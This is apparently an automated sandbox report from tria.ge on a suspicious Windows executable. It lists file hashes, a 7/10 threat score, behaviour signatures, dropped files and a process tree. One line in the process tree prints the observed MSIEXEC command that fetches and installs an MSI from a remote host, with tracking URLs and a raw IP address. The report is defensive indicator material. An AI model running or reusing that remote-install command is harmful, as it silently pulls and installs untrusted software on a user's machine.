Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 06:14

General

  • Target

    2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe

  • Size

    1.4MB

  • MD5

    2784fb6d81216553213b3aa03a6eb06f

  • SHA1

    1688f0606b9c0c81946e820033a31722a148d352

  • SHA256

    dbdaf1a65d775f6913c8ec9c2c49ebdd87b3b913edb7529d7c4bc4aca11aa47e

  • SHA512

    f3c7a507fa711b69087389fdef1f96f06eead9dcc18d4679df43fd560d943bbc6d17dec66ec804679ef7bf9056a19c66a323f86569240134e6c2c3ca7d925645

  • SSDEEP

    24576:Enn/S5jnARqPoKCoL+4rBKBftXWxEA+7Nq2WNpmbEdOvBYl2mj0yQnhrcufW:0S9nARyf+4yXwEAQNq9pmbEYZGfQychA

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:692
    • C:\Users\Admin\AppData\Local\Temp\x9Xfwi.exe
      "C:\Users\Admin\AppData\Local\Temp\x9Xfwi.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:924
      • C:\Windows\SysWOW64\MSIEXEC.EXE
        MSIEXEC.EXE /i "http://download.cdnpackages.eu/36175/cdn/99slot/99 Slot Machine20120417103607.msi" DDC_DID=1026351 DDC_RTGURL=http://www.dlhsetup.eu/dl/TrackSetup/TrackSetup.aspx?DID=1026351 DDC_UPDATESTATUSURL=http://190.4.88.51:8080/99slotmachine/Lobby.WebServices/Installer.asmx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="x9Xfwi.exe"
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1500

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_is767D.tmp

    Filesize

    1KB

    MD5

    e6b794c9d19995a62ca398b2668ec0ee

    SHA1

    646a119c22621818949d6f0c6cde362a305b1eff

    SHA256

    9f64723cc13951ce2413694a701560cb9ac371be33c398f513fce5e91bd64b31

    SHA512

    cf997442d2424e197d524529473f6924654d163f689104a53100f3a1721a2cceea33c44c96a897d86c4c1690069176aff56766ef8f41ca3318ca0c55173603ba

  • C:\Users\Admin\AppData\Local\Temp\x9Xfwi.exe

    Filesize

    1.1MB

    MD5

    0a8b141b5cb3c74eb7f9db383125bc1a

    SHA1

    cf6482db72907c3c4f43ac1b6a0669c9121c408a

    SHA256

    2a484c061088a31f89c87b6c64967d8d3d2ed5a1bcf584e49bf645b1bdb65c11

    SHA512

    e3d7300e05c4e34b4d82f81a4f48ce09061363769a074eb12b2aa0a8cc2c21d5026a2f1b6faef27e80075edc3c35e8d77f5f8bd36cf307f143b3f878b5e044fa

  • C:\Users\Admin\AppData\Local\Temp\{1AD4236F-9FAE-427D-AD14-3478EA67BCD3}\0x0409.ini

    Filesize

    21KB

    MD5

    be345d0260ae12c5f2f337b17e07c217

    SHA1

    0976ba0982fe34f1c35a0974f6178e15c238ed7b

    SHA256

    e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

    SHA512

    77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

  • C:\Users\Admin\AppData\Local\Temp\{1AD4236F-9FAE-427D-AD14-3478EA67BCD3}\_ISMSIDEL.INI

    Filesize

    20B

    MD5

    db9af7503f195df96593ac42d5519075

    SHA1

    1b487531bad10f77750b8a50aca48593379e5f56

    SHA256

    0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

    SHA512

    6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

  • C:\Users\Admin\AppData\Local\Temp\~766A.tmp

    Filesize

    5KB

    MD5

    b6bec071b600aecfa9a273a5772e4a5e

    SHA1

    004e1ef817823715b9fa179834a3db5a610176a3

    SHA256

    b41192d8a94b4db13e9e2a92acb6337ed7a37d5bc7562d6286951966a09db4bf

    SHA512

    528561cf2a1655fcbb8942c91e2c5cce44a9d1a14440820a28df31122dc66ef0215369631c3239f17d059cd5e744fd3e9a0cf94bd07575669d72fee23e8f343a